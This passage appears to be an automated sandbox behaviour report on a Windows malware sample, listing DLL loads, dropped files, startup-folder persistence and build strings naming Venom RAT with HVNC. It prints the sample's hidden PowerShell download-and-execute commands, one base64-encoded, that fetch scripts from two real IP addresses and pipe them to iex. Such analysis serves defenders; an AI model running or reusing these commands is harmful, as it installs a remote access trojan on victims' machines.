            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: mfc42u.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: aclui.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: ntdsapi.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: dataexchange.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: dcomp.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Temp\Package.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
            Source: C:\Windows\Temp\Package.exeWindow found: window name: SysTabControl32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Temp\Package.exeWindow detected: Number of UI elements: 24
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: Binary string: C:\Users\Administrator\source\repos\Project9\Release\Project9.pdb source: Package.exe, 00000005.00000002.2331727344.000000006E2FF000.00000002.00000001.01000000.00000009.sdmp, iviewers.dll.3.dr
            Source: Binary string: OLEView.pdb source: powershell.exe, 00000003.00000002.2177596881.00000169B176B000.00000004.00000800.00020000.00000000.sdmp, Package.exe, Package.exe, 00000005.00000002.2330978558.0000000000D21000.00000020.00000001.01000000.00000008.sdmp, Package.exe.3.dr
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb] source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.pdb source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 12.03.2024 Fixed Logger\HVNCDll\obj\Release\hvnc.pdb source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($J3Vpk) $qW3iC = [Convert]::FromBase64String($fTMhG) $iAdZA = [Convert]::FromBase64String($OSgCW) $8yrmU = [System.Security.Cryptography.Aes]::Create() $8yrmU.Key = $AohO0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgA
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -enc aQB3AHIAIAAtAHUAcwBlAGIAIABoAHQAdABwADoALwAvADEAOAA1AC4AMQA0ADkALgAxADQANgAuADEANgA0AC8AdwByAGMAYQBmAC4AcABzADEAIAB8ACAAaQBlAHgAJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.cmdline"Jump to behavior
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D2B905 __EH_prolog3_GS,#540,#4155,StringFromGUID2,wsprintfW,RegQueryValueW,#540,#540,#538,#4155,#4155,#940,#4155,#940,#1197,#355,#2507,#3494,#858,#800,#800,#641,LoadLibraryW,GetProcAddress,#800,#641,#4155,#4155,#940,#1197,FreeLibrary,#6398,#800,#800,#800,#800,5_2_00D2B905
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3F3B0 push ecx; ret 5_2_00D3F3C3
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_00D3FDDD push ecx; ret 5_2_00D3FDF0
            Source: C:\Windows\Temp\Package.exeCode function: 5_2_6E2FE864 push ecx; ret 5_2_6E2FE877
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Package.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\iacipmps\iacipmps.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\iviewers.dllJump to dropped file
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Windows\Temp\Package.exeJump to dropped file

            Boot Survival

            barindex
            Source: Yara matchFile source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeleteApp.urlJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
